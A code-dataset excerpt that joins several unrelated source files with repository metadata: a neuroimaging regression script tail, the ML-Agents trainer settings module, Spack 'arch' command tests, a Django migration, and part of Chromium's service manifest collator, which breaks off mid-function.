mask, header = cifti.read('/nfs/p1/atlases/multimodal_glasser/surface/MMP_mpmLR32k.dlabel.nii')
neighbor_table = fr.mask_dictdata(mask)
actmap_path = ['/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/task_merge_cohend/cohend_24contrast_zscore/'+sid+'_cohend_zscore.dtseries.nii' for sid in subjID]
icmap_subj_itr_path = ['/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/rest_comp/subjIC_itr/IC50_'+sid+'.dscalar.nii' for sid in subjID]
glm = linear_model.LinearRegression(fit_intercept=False)
actmap = fr.cifti_read(actmap_path, 0, 'both')
actmap_zscore = stats.zscore(actmap,axis=-1)
mean_actmap = np.mean(actmap_zscore,axis=0)
for i in range(nsubj):
glm.fit(mean_actmap.T, actmap_zscore[i,...].T)
actmap_zscore[i,...] = actmap_zscore[i,...] - np.dot(glm.coef_, mean_actmap)
subcortex_component = np.array([27,28,31,34,36,38,39,40,41,42,43,44,45,46,47,48,49])
# subcortex_component = np.array([])
cortex_component = np.delete(np.arange(50), subcortex_component)
icmap = fr.cifti_read(icmap_subj_itr_path, cortex_component, 'both')
icmap_zscore = stats.zscore(icmap,axis=-1)
# mean_icmap = np.mean(icmap_zscore,axis=0)
# for i in range(nsubj):
# glm.fit(mean_icmap.T, icmap_zscore[i,...].T)
# icmap_zscore[i,...] = icmap_zscore[i,...] - np.dot(glm.coef_, mean_icmap)
for i in range(nsubj):
print('Now calculating beta for subject {0}'.format(i+1))
betamap, scoremap = fr.linear_estimate_model(actmap_zscore[i,...], icmap_zscore[i,...], neighbor_table)
fr.save_maps_to_nifti(betamap, pjoin('/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/program/framework/betamap/MMP_cortex_33comp_residuecognitive', 'beta_'+str(i+1)+'.nii.gz'))
| 42.367347 | 186 | 0.755299 |
62ded20ed115292d2b1a0ba6f5d7917e1cf49b4f | 27,310 | py | Python | ml-agents/mlagents/trainers/settings.py | J-Travnik/ml-agents | c392380ab32bd762536a83501483dd5e7d1898c8 | [
"Apache-2.0"
] | null | null | null | ml-agents/mlagents/trainers/settings.py | J-Travnik/ml-agents | c392380ab32bd762536a83501483dd5e7d1898c8 | [
"Apache-2.0"
] | null | null | null | ml-agents/mlagents/trainers/settings.py | J-Travnik/ml-agents | c392380ab32bd762536a83501483dd5e7d1898c8 | [
"Apache-2.0"
] | null | null | null | import warnings
import attr
import cattr
from typing import Dict, Optional, List, Any, DefaultDict, Mapping, Tuple, Union
from enum import Enum
import collections
import argparse
import abc
import numpy as np
import math
from mlagents.trainers.cli_utils import StoreConfigFile, DetectDefault, parser
from mlagents.trainers.cli_utils import load_config
from mlagents.trainers.exception import TrainerConfigError, TrainerConfigWarning
from mlagents_envs import logging_util
from mlagents_envs.side_channel.environment_parameters_channel import (
EnvironmentParametersChannel,
)
logger = logging_util.get_logger(__name__)
def check_and_structure(key: str, value: Any, class_type: type) -> Any:
attr_fields_dict = attr.fields_dict(class_type)
if key not in attr_fields_dict:
raise TrainerConfigError(
f"The option {key} was specified in your YAML file for {class_type.__name__}, but is invalid."
)
# Apply cattr structure to the values
return cattr.structure(value, attr_fields_dict[key].type)
def strict_to_cls(d: Mapping, t: type) -> Any:
if not isinstance(d, Mapping):
raise TrainerConfigError(f"Unsupported config {d} for {t.__name__}.")
d_copy: Dict[str, Any] = {}
d_copy.update(d)
for key, val in d_copy.items():
d_copy[key] = check_and_structure(key, val, t)
return t(**d_copy)
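    # Sketch with hypothetical values: strict_to_cls({"batch_size": 256},
    # PPOSettings) returns a PPOSettings with batch_size=256, while an unknown
    # key such as "batchsize" raises TrainerConfigError in check_and_structure.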
def defaultdict_to_dict(d: DefaultDict) -> Dict:
return {key: cattr.unstructure(val) for key, val in d.items()}
class SerializationSettings:
convert_to_barracuda = True
convert_to_onnx = True
onnx_opset = 9
@attr.s(auto_attribs=True)
class ExportableSettings:
def as_dict(self):
return cattr.unstructure(self)
class EncoderType(Enum):
SIMPLE = "simple"
NATURE_CNN = "nature_cnn"
RESNET = "resnet"
class ScheduleType(Enum):
CONSTANT = "constant"
LINEAR = "linear"
@attr.s(auto_attribs=True)
class NetworkSettings:
@attr.s
class MemorySettings:
sequence_length: int = attr.ib(default=64)
memory_size: int = attr.ib(default=128)
@memory_size.validator
def _check_valid_memory_size(self, attribute, value):
if value <= 0:
raise TrainerConfigError(
"When using a recurrent network, memory size must be greater than 0."
)
elif value % 2 != 0:
raise TrainerConfigError(
"When using a recurrent network, memory size must be divisible by 2."
)
normalize: bool = False
hidden_units: int = 128
num_layers: int = 2
vis_encode_type: EncoderType = EncoderType.SIMPLE
memory: Optional[MemorySettings] = None
@attr.s(auto_attribs=True)
class BehavioralCloningSettings:
demo_path: str
steps: int = 0
strength: float = 1.0
samples_per_update: int = 0
# Setting either of these to None will allow the Optimizer
# to decide these parameters, based on Trainer hyperparams
num_epoch: Optional[int] = None
batch_size: Optional[int] = None
@attr.s(auto_attribs=True)
class HyperparamSettings:
batch_size: int = 1024
buffer_size: int = 10240
learning_rate: float = 3.0e-4
learning_rate_schedule: ScheduleType = ScheduleType.CONSTANT
@attr.s(auto_attribs=True)
class PPOSettings(HyperparamSettings):
beta: float = 5.0e-3
epsilon: float = 0.2
lambd: float = 0.95
num_epoch: int = 3
learning_rate_schedule: ScheduleType = ScheduleType.LINEAR
@attr.s(auto_attribs=True)
class SACSettings(HyperparamSettings):
batch_size: int = 128
buffer_size: int = 50000
buffer_init_steps: int = 0
tau: float = 0.005
steps_per_update: float = 1
save_replay_buffer: bool = False
init_entcoef: float = 1.0
reward_signal_steps_per_update: float = attr.ib()
@reward_signal_steps_per_update.default
def _reward_signal_steps_per_update_default(self):
return self.steps_per_update
# INTRINSIC REWARD SIGNALS #############################################################
class RewardSignalType(Enum):
EXTRINSIC: str = "extrinsic"
GAIL: str = "gail"
CURIOSITY: str = "curiosity"
def to_settings(self) -> type:
_mapping = {
RewardSignalType.EXTRINSIC: RewardSignalSettings,
RewardSignalType.GAIL: GAILSettings,
RewardSignalType.CURIOSITY: CuriositySettings,
}
return _mapping[self]
@attr.s(auto_attribs=True)
class RewardSignalSettings:
gamma: float = 0.99
strength: float = 1.0
@staticmethod
def structure(d: Mapping, t: type) -> Any:
"""
        Helper method to structure a Dict of RewardSignalSettings classes. Meant to be registered with
cattr.register_structure_hook() and called with cattr.structure(). This is needed to handle
the special Enum selection of RewardSignalSettings classes.
"""
if not isinstance(d, Mapping):
raise TrainerConfigError(f"Unsupported reward signal configuration {d}.")
d_final: Dict[RewardSignalType, RewardSignalSettings] = {}
for key, val in d.items():
enum_key = RewardSignalType(key)
t = enum_key.to_settings()
d_final[enum_key] = strict_to_cls(val, t)
return d_final
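        # Example of the expected YAML shape (values illustrative):
        #   {"extrinsic": {"gamma": 0.99},
        #    "gail": {"demo_path": "demos/expert.demo"}}
        # structures to {RewardSignalType.EXTRINSIC: RewardSignalSettings(...),
        #                RewardSignalType.GAIL: GAILSettings(...)}.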
@attr.s(auto_attribs=True)
class GAILSettings(RewardSignalSettings):
encoding_size: int = 64
learning_rate: float = 3e-4
use_actions: bool = False
use_vail: bool = False
demo_path: str = attr.ib(kw_only=True)
@attr.s(auto_attribs=True)
class CuriositySettings(RewardSignalSettings):
encoding_size: int = 64
learning_rate: float = 3e-4
# SAMPLERS #############################################################################
class ParameterRandomizationType(Enum):
UNIFORM: str = "uniform"
GAUSSIAN: str = "gaussian"
MULTIRANGEUNIFORM: str = "multirangeuniform"
CONSTANT: str = "constant"
def to_settings(self) -> type:
_mapping = {
ParameterRandomizationType.UNIFORM: UniformSettings,
ParameterRandomizationType.GAUSSIAN: GaussianSettings,
ParameterRandomizationType.MULTIRANGEUNIFORM: MultiRangeUniformSettings,
ParameterRandomizationType.CONSTANT: ConstantSettings
# Constant type is handled if a float is provided instead of a config
}
return _mapping[self]
@attr.s(auto_attribs=True)
class ParameterRandomizationSettings(abc.ABC):
seed: int = parser.get_default("seed")
@staticmethod
def structure(
d: Union[Mapping, float], t: type
) -> "ParameterRandomizationSettings":
"""
        Helper method to structure a ParameterRandomizationSettings class. Meant to be registered with
cattr.register_structure_hook() and called with cattr.structure(). This is needed to handle
the special Enum selection of ParameterRandomizationSettings classes.
"""
if isinstance(d, (float, int)):
return ConstantSettings(value=d)
if not isinstance(d, Mapping):
raise TrainerConfigError(
f"Unsupported parameter randomization configuration {d}."
)
if "sampler_type" not in d:
raise TrainerConfigError(
f"Sampler configuration does not contain sampler_type : {d}."
)
if "sampler_parameters" not in d:
raise TrainerConfigError(
f"Sampler configuration does not contain sampler_parameters : {d}."
)
enum_key = ParameterRandomizationType(d["sampler_type"])
t = enum_key.to_settings()
return strict_to_cls(d["sampler_parameters"], t)
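        # A bare float such as 3.5 structures to ConstantSettings(value=3.5);
        # a mapping like {"sampler_type": "uniform", "sampler_parameters":
        # {"min_value": 0.5, "max_value": 8.0}} structures to UniformSettings
        # (values here are illustrative).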
@staticmethod
def unstructure(d: "ParameterRandomizationSettings") -> Mapping:
"""
        Helper method to unstructure a ParameterRandomizationSettings class. Meant to be registered with
cattr.register_unstructure_hook() and called with cattr.unstructure().
"""
_reversed_mapping = {
UniformSettings: ParameterRandomizationType.UNIFORM,
GaussianSettings: ParameterRandomizationType.GAUSSIAN,
MultiRangeUniformSettings: ParameterRandomizationType.MULTIRANGEUNIFORM,
ConstantSettings: ParameterRandomizationType.CONSTANT,
}
sampler_type: Optional[str] = None
for t, name in _reversed_mapping.items():
if isinstance(d, t):
sampler_type = name.value
sampler_parameters = attr.asdict(d)
return {"sampler_type": sampler_type, "sampler_parameters": sampler_parameters}
@abc.abstractmethod
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the appropriate sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
pass
@attr.s(auto_attribs=True)
class ConstantSettings(ParameterRandomizationSettings):
value: float = 0.0
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the constant sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_float_parameter(key, self.value)
@attr.s(auto_attribs=True)
class UniformSettings(ParameterRandomizationSettings):
min_value: float = attr.ib()
max_value: float = 1.0
@min_value.default
def _min_value_default(self):
return 0.0
@min_value.validator
def _check_min_value(self, attribute, value):
if self.min_value > self.max_value:
raise TrainerConfigError(
"Minimum value is greater than maximum value in uniform sampler."
)
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the uniform sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_uniform_sampler_parameters(
key, self.min_value, self.max_value, self.seed
)
@attr.s(auto_attribs=True)
class GaussianSettings(ParameterRandomizationSettings):
mean: float = 1.0
st_dev: float = 1.0
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the gaussian sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_gaussian_sampler_parameters(
key, self.mean, self.st_dev, self.seed
)
@attr.s(auto_attribs=True)
class MultiRangeUniformSettings(ParameterRandomizationSettings):
intervals: List[Tuple[float, float]] = attr.ib()
@intervals.default
def _intervals_default(self):
return [[0.0, 1.0]]
@intervals.validator
def _check_intervals(self, attribute, value):
for interval in self.intervals:
if len(interval) != 2:
raise TrainerConfigError(
f"The sampling interval {interval} must contain exactly two values."
)
min_value, max_value = interval
if min_value > max_value:
raise TrainerConfigError(
f"Minimum value is greater than maximum value in interval {interval}."
)
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the multirangeuniform sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_multirangeuniform_sampler_parameters(
key, self.intervals, self.seed
)
# ENVIRONMENT PARAMETERS ###############################################################
@attr.s(auto_attribs=True)
class CompletionCriteriaSettings:
"""
CompletionCriteriaSettings contains the information needed to figure out if the next
lesson must start.
"""
class MeasureType(Enum):
PROGRESS: str = "progress"
REWARD: str = "reward"
behavior: str
measure: MeasureType = attr.ib(default=MeasureType.REWARD)
min_lesson_length: int = 0
signal_smoothing: bool = True
threshold: float = attr.ib(default=0.0)
require_reset: bool = False
@threshold.validator
def _check_threshold_value(self, attribute, value):
"""
Verify that the threshold has a value between 0 and 1 when the measure is
PROGRESS
"""
if self.measure == self.MeasureType.PROGRESS:
if self.threshold > 1.0:
raise TrainerConfigError(
"Threshold for next lesson cannot be greater than 1 when the measure is progress."
)
if self.threshold < 0.0:
raise TrainerConfigError(
"Threshold for next lesson cannot be negative when the measure is progress."
)
def need_increment(
self, progress: float, reward_buffer: List[float], smoothing: float
) -> Tuple[bool, float]:
"""
Given measures, this method returns a boolean indicating if the lesson
needs to change now, and a float corresponding to the new smoothed value.
"""
# Is the min number of episodes reached
if len(reward_buffer) < self.min_lesson_length:
return False, smoothing
if self.measure == CompletionCriteriaSettings.MeasureType.PROGRESS:
if progress > self.threshold:
return True, smoothing
if self.measure == CompletionCriteriaSettings.MeasureType.REWARD:
if len(reward_buffer) < 1:
return False, smoothing
measure = np.mean(reward_buffer)
if math.isnan(measure):
return False, smoothing
if self.signal_smoothing:
measure = 0.25 * smoothing + 0.75 * measure
smoothing = measure
if measure > self.threshold:
return True, smoothing
return False, smoothing
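        # Worked example of the smoothing step (illustrative numbers): with
        # signal_smoothing on, smoothing=1.0 and a reward-buffer mean of 2.0
        # give measure = 0.25 * 1.0 + 0.75 * 2.0 = 1.75, which is then
        # compared against self.threshold.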
@attr.s(auto_attribs=True)
class Lesson:
"""
Gathers the data of one lesson for one environment parameter including its name,
the condition that must be fullfiled for the lesson to be completed and a sampler
for the environment parameter. If the completion_criteria is None, then this is
the last lesson in the curriculum.
"""
value: ParameterRandomizationSettings
name: str
completion_criteria: Optional[CompletionCriteriaSettings] = attr.ib(default=None)
@attr.s(auto_attribs=True)
class EnvironmentParameterSettings:
"""
EnvironmentParameterSettings is an ordered list of lessons for one environment
parameter.
"""
curriculum: List[Lesson]
@staticmethod
def _check_lesson_chain(lessons, parameter_name):
"""
Ensures that when using curriculum, all non-terminal lessons have a valid
CompletionCriteria, and that the terminal lesson does not contain a CompletionCriteria.
"""
num_lessons = len(lessons)
for index, lesson in enumerate(lessons):
if index < num_lessons - 1 and lesson.completion_criteria is None:
raise TrainerConfigError(
f"A non-terminal lesson does not have a completion_criteria for {parameter_name}."
)
if index == num_lessons - 1 and lesson.completion_criteria is not None:
warnings.warn(
f"Your final lesson definition contains completion_criteria for {parameter_name}."
f"It will be ignored.",
TrainerConfigWarning,
)
@staticmethod
def structure(d: Mapping, t: type) -> Dict[str, "EnvironmentParameterSettings"]:
"""
        Helper method to structure a Dict of EnvironmentParameterSettings classes. Meant
to be registered with cattr.register_structure_hook() and called with
cattr.structure().
"""
if not isinstance(d, Mapping):
raise TrainerConfigError(
f"Unsupported parameter environment parameter settings {d}."
)
d_final: Dict[str, EnvironmentParameterSettings] = {}
for environment_parameter, environment_parameter_config in d.items():
if (
isinstance(environment_parameter_config, Mapping)
and "curriculum" in environment_parameter_config
):
d_final[environment_parameter] = strict_to_cls(
environment_parameter_config, EnvironmentParameterSettings
)
EnvironmentParameterSettings._check_lesson_chain(
d_final[environment_parameter].curriculum, environment_parameter
)
else:
sampler = ParameterRandomizationSettings.structure(
environment_parameter_config, ParameterRandomizationSettings
)
d_final[environment_parameter] = EnvironmentParameterSettings(
curriculum=[
Lesson(
completion_criteria=None,
value=sampler,
name=environment_parameter,
)
]
)
return d_final
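        # Sketch (hypothetical config): {"gravity": 9.8} becomes a one-lesson
        # curriculum wrapping a ConstantSettings sampler, while
        # {"gravity": {"curriculum": [...]}} is structured lesson by lesson
        # and validated by _check_lesson_chain.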
# TRAINERS #############################################################################
@attr.s(auto_attribs=True)
class SelfPlaySettings:
save_steps: int = 20000
team_change: int = attr.ib()
@team_change.default
def _team_change_default(self):
        # By default, assign team_change to 5x save_steps
return self.save_steps * 5
swap_steps: int = 2000
window: int = 10
play_against_latest_model_ratio: float = 0.5
initial_elo: float = 1200.0
class TrainerType(Enum):
PPO: str = "ppo"
SAC: str = "sac"
def to_settings(self) -> type:
_mapping = {TrainerType.PPO: PPOSettings, TrainerType.SAC: SACSettings}
return _mapping[self]
@attr.s(auto_attribs=True)
class TrainerSettings(ExportableSettings):
trainer_type: TrainerType = TrainerType.PPO
hyperparameters: HyperparamSettings = attr.ib()
@hyperparameters.default
def _set_default_hyperparameters(self):
return self.trainer_type.to_settings()()
network_settings: NetworkSettings = attr.ib(factory=NetworkSettings)
reward_signals: Dict[RewardSignalType, RewardSignalSettings] = attr.ib(
factory=lambda: {RewardSignalType.EXTRINSIC: RewardSignalSettings()}
)
init_path: Optional[str] = None
keep_checkpoints: int = 5
checkpoint_interval: int = 500000
max_steps: int = 500000
time_horizon: int = 64
summary_freq: int = 50000
threaded: bool = True
self_play: Optional[SelfPlaySettings] = None
behavioral_cloning: Optional[BehavioralCloningSettings] = None
cattr.register_structure_hook(
Dict[RewardSignalType, RewardSignalSettings], RewardSignalSettings.structure
)
@network_settings.validator
def _check_batch_size_seq_length(self, attribute, value):
if self.network_settings.memory is not None:
if (
self.network_settings.memory.sequence_length
> self.hyperparameters.batch_size
):
raise TrainerConfigError(
"When using memory, sequence length must be less than or equal to batch size. "
)
@staticmethod
def dict_to_defaultdict(d: Dict, t: type) -> DefaultDict:
return collections.defaultdict(
TrainerSettings, cattr.structure(d, Dict[str, TrainerSettings])
)
@staticmethod
def structure(d: Mapping, t: type) -> Any:
"""
Helper method to structure a TrainerSettings class. Meant to be registered with
cattr.register_structure_hook() and called with cattr.structure().
"""
if not isinstance(d, Mapping):
raise TrainerConfigError(f"Unsupported config {d} for {t.__name__}.")
d_copy: Dict[str, Any] = {}
d_copy.update(d)
for key, val in d_copy.items():
if attr.has(type(val)):
# Don't convert already-converted attrs classes.
continue
if key == "hyperparameters":
if "trainer_type" not in d_copy:
raise TrainerConfigError(
"Hyperparameters were specified but no trainer_type was given."
)
else:
d_copy[key] = strict_to_cls(
d_copy[key], TrainerType(d_copy["trainer_type"]).to_settings()
)
elif key == "max_steps":
d_copy[key] = int(float(val))
# In some legacy configs, max steps was specified as a float
else:
d_copy[key] = check_and_structure(key, val, t)
return t(**d_copy)
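        # Sketch (illustrative values): {"trainer_type": "sac",
        #  "hyperparameters": {"tau": 0.01}, "max_steps": 5.0e5} structures to
        # a TrainerSettings with SACSettings hyperparameters and max_steps
        # coerced to the int 500000.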
# COMMAND LINE #########################################################################
@attr.s(auto_attribs=True)
class CheckpointSettings:
run_id: str = parser.get_default("run_id")
initialize_from: Optional[str] = parser.get_default("initialize_from")
load_model: bool = parser.get_default("load_model")
resume: bool = parser.get_default("resume")
force: bool = parser.get_default("force")
train_model: bool = parser.get_default("train_model")
inference: bool = parser.get_default("inference")
@attr.s(auto_attribs=True)
class EnvironmentSettings:
env_path: Optional[str] = parser.get_default("env_path")
env_args: Optional[List[str]] = parser.get_default("env_args")
base_port: int = parser.get_default("base_port")
num_envs: int = attr.ib(default=parser.get_default("num_envs"))
seed: int = parser.get_default("seed")
@num_envs.validator
def validate_num_envs(self, attribute, value):
if value > 1 and self.env_path is None:
raise ValueError("num_envs must be 1 if env_path is not set.")
@attr.s(auto_attribs=True)
class EngineSettings:
width: int = parser.get_default("width")
height: int = parser.get_default("height")
quality_level: int = parser.get_default("quality_level")
time_scale: float = parser.get_default("time_scale")
target_frame_rate: int = parser.get_default("target_frame_rate")
capture_frame_rate: int = parser.get_default("capture_frame_rate")
no_graphics: bool = parser.get_default("no_graphics")
@attr.s(auto_attribs=True)
class RunOptions(ExportableSettings):
behaviors: DefaultDict[str, TrainerSettings] = attr.ib(
factory=lambda: collections.defaultdict(TrainerSettings)
)
env_settings: EnvironmentSettings = attr.ib(factory=EnvironmentSettings)
engine_settings: EngineSettings = attr.ib(factory=EngineSettings)
environment_parameters: Optional[Dict[str, EnvironmentParameterSettings]] = None
checkpoint_settings: CheckpointSettings = attr.ib(factory=CheckpointSettings)
# These are options that are relevant to the run itself, and not the engine or environment.
# They will be left here.
debug: bool = parser.get_default("debug")
# Strict conversion
cattr.register_structure_hook(EnvironmentSettings, strict_to_cls)
cattr.register_structure_hook(EngineSettings, strict_to_cls)
cattr.register_structure_hook(CheckpointSettings, strict_to_cls)
cattr.register_structure_hook(
Dict[str, EnvironmentParameterSettings], EnvironmentParameterSettings.structure
)
cattr.register_structure_hook(Lesson, strict_to_cls)
cattr.register_structure_hook(
ParameterRandomizationSettings, ParameterRandomizationSettings.structure
)
cattr.register_unstructure_hook(
ParameterRandomizationSettings, ParameterRandomizationSettings.unstructure
)
cattr.register_structure_hook(TrainerSettings, TrainerSettings.structure)
cattr.register_structure_hook(
DefaultDict[str, TrainerSettings], TrainerSettings.dict_to_defaultdict
)
cattr.register_unstructure_hook(collections.defaultdict, defaultdict_to_dict)
@staticmethod
def from_argparse(args: argparse.Namespace) -> "RunOptions":
"""
Takes an argparse.Namespace as specified in `parse_command_line`, loads input configuration files
from file paths, and converts to a RunOptions instance.
:param args: collection of command-line parameters passed to mlagents-learn
:return: RunOptions representing the passed in arguments, with trainer config, curriculum and sampler
configs loaded from files.
"""
argparse_args = vars(args)
config_path = StoreConfigFile.trainer_config_path
# Load YAML
configured_dict: Dict[str, Any] = {
"checkpoint_settings": {},
"env_settings": {},
"engine_settings": {},
}
if config_path is not None:
configured_dict.update(load_config(config_path))
# Use the YAML file values for all values not specified in the CLI.
for key in configured_dict.keys():
# Detect bad config options
if key not in attr.fields_dict(RunOptions):
raise TrainerConfigError(
"The option {} was specified in your YAML file, but is invalid.".format(
key
)
)
# Override with CLI args
# Keep deprecated --load working, TODO: remove
argparse_args["resume"] = argparse_args["resume"] or argparse_args["load_model"]
for key, val in argparse_args.items():
if key in DetectDefault.non_default_args:
if key in attr.fields_dict(CheckpointSettings):
configured_dict["checkpoint_settings"][key] = val
elif key in attr.fields_dict(EnvironmentSettings):
configured_dict["env_settings"][key] = val
elif key in attr.fields_dict(EngineSettings):
configured_dict["engine_settings"][key] = val
else: # Base options
configured_dict[key] = val
return RunOptions.from_dict(configured_dict)
@staticmethod
def from_dict(options_dict: Dict[str, Any]) -> "RunOptions":
return cattr.structure(options_dict, RunOptions)
| 37.513736 | 109 | 0.655181 |
50eed5454c3f0afc7c0dd18a1b05db23ca21f1d4 | 151 | py | Python | tests/__init__.py | caominhduy/epicas | 989b792380ffd47e879c54881447c1d6b1caf67e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | caominhduy/epicas | 989b792380ffd47e879c54881447c1d6b1caf67e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | caominhduy/epicas | 989b792380ffd47e879c54881447c1d6b1caf67e | [
"Apache-2.0"
] | null | null | null | from .data_loading_test import StructuredDataTest
from .feature_engineering_test import FeatureEngineeringTest
from .model_test import SingleModelTest
| 37.75 | 60 | 0.900662 |
e7043672bc1e35842735620464e1d8636dbcd68f | 1,049 | py | Python | lib/spack/spack/test/cmd/arch.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11 | 2015-10-04T02:17:46.000Z | 2018-02-07T18:23:00.000Z | lib/spack/spack/test/cmd/arch.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22 | 2017-08-01T22:45:10.000Z | 2022-03-10T07:46:31.000Z | lib/spack/spack/test/cmd/arch.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4 | 2016-06-10T17:57:39.000Z | 2018-09-11T04:59:38.000Z | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.main import SpackCommand
arch = SpackCommand('arch')
def test_arch():
"""Sanity check ``spack arch`` to make sure it works."""
arch()
arch('-f')
arch('--frontend')
arch('-b')
arch('--backend')
def test_arch_platform():
"""Sanity check ``spack arch --platform`` to make sure it works."""
arch('-p')
arch('--platform')
arch('-f', '-p')
arch('-b', '-p')
def test_arch_operating_system():
"""Sanity check ``spack arch --operating-system`` to make sure it works."""
arch('-o')
arch('--operating-system')
arch('-f', '-o')
arch('-b', '-o')
def test_arch_target():
"""Sanity check ``spack arch --target`` to make sure it works."""
arch('-t')
arch('--target')
arch('-f', '-t')
arch('-b', '-t')
def test_display_targets():
arch('--known-targets')
| 20.98 | 79 | 0.601525 |
26201e864403fe9e8549d75291573e79dd767d18 | 478 | py | Python | recipes/migrations/0009_alter_recipe_servings.py | sergeant-savage/my-recipe-app | cb1b5c05928689aed2c1637d8b4cf1ab08daf4b6 | [
"MIT"
] | 1 | 2021-08-11T11:43:06.000Z | 2021-08-11T11:43:06.000Z | recipes/migrations/0009_alter_recipe_servings.py | sergeant-savage/my-recipe-app | cb1b5c05928689aed2c1637d8b4cf1ab08daf4b6 | [
"MIT"
] | 8 | 2021-08-11T00:55:32.000Z | 2021-08-15T20:48:59.000Z | recipes/migrations/0009_alter_recipe_servings.py | sergeant-savage/my-recipe-app | cb1b5c05928689aed2c1637d8b4cf1ab08daf4b6 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-07-24 21:16
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recipes', '0008_alter_recipe_servings'),
]
operations = [
migrations.AlterField(
model_name='recipe',
name='servings',
field=models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1)]),
),
]
| 23.9 | 107 | 0.646444 |
42cef4905b4319ac091db49a348812043b96faef | 3,997 | py | Python | services/service_manager/public/tools/manifest/manifest_collator.py | zipated/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | services/service_manager/public/tools/manifest/manifest_collator.py | cangulcan/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | services/service_manager/public/tools/manifest/manifest_collator.py | cangulcan/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" A collator for Service Manifests """
import argparse
import json
import os
import shutil
import sys
import urlparse
# Keys which are completely overridden by manifest overlays
_MANIFEST_OVERLAY_OVERRIDE_KEYS = [
"display_name",
]
# Keys which are merged with content from manifest overlays
_MANIFEST_OVERLAY_MERGE_KEYS = [
"interface_provider_specs",
"required_files",
]
eater_relative = "../../../../../../tools/json_comment_eater"
eater_relative = os.path.join(os.path.abspath(__file__), eater_relative)
sys.path.insert(0, os.path.normpath(eater_relative))
try:
import json_comment_eater
finally:
sys.path.pop(0)
def ParseJSONFile(filename):
with open(filename) as json_file:
try:
return json.loads(json_comment_eater.Nom(json_file.read()))
except ValueError as e:
print "%s is not a valid JSON document" % filename
raise e
def MergeDicts(left, right):
for k, v in right.iteritems():
if k not in left:
left[k] = v
else:
if isinstance(v, dict):
assert isinstance(left[k], dict)
MergeDicts(left[k], v)
elif isinstance(v, list):
assert isinstance(left[k], list)
left[k].extend(v)
else:
raise "Refusing to merge conflicting non-collection values."
return left
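  # Example: MergeDicts({"a": {"x": 1}, "b": [1]}, {"a": {"y": 2}, "b": [2]})
  # yields {"a": {"x": 1, "y": 2}, "b": [1, 2]}; conflicting scalar values
  # raise instead of being silently overwritten.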
def MergeManifestOverlay(manifest, overlay):
for key in _MANIFEST_OVERLAY_MERGE_KEYS:
if key in overlay:
MergeDicts(manifest[key], overlay[key])
if "services" in overlay:
if "services" not in manifest:
manifest["services"] = []
manifest["services"].extend(overlay["services"])
for key in _MANIFEST_OVERLAY_OVERRIDE_KEYS:
if key in overlay:
manifest[key] = overlay[key]
def SanityCheckManifestServices(manifest):
"""Ensures any given service name appears only once within a manifest."""
known_services = set()
def has_no_dupes(root):
if "name" in root:
name = root["name"]
if name in known_services:
raise ValueError(
"Duplicate manifest entry found for service: %s" % name)
known_services.add(name)
if "services" not in root:
return True
return all(has_no_dupes(service) for service in root["services"])
return has_no_dupes(manifest)
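  # Example: a manifest whose "services" list contains two entries sharing a
  # "name" fails with a ValueError naming the duplicated service.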
def main():
parser = argparse.ArgumentParser(
description="Collate Service Manifests.")
parser.add_argument("--parent")
parser.add_argument("--output")
parser.add_argument("--name")
parser.add_argument("--pretty", action="store_true")
parser.add_argument("--overlays", nargs="+", dest="overlays", default=[])
parser.add_argument("--packaged-services", nargs="+",
dest="packaged_services", default=[])
args, _ = parser.parse_known_args()
parent = ParseJSONFile(args.parent)
service_name = parent["name"] if "name" in parent else ""
if args.name and args.name != service_name:
raise ValueError("Service name '%s' specified in build file does not " \
"match name '%s' specified in manifest." %
(args.name, service_name))
packaged_services = []
for child_manifest in args.packaged_services:
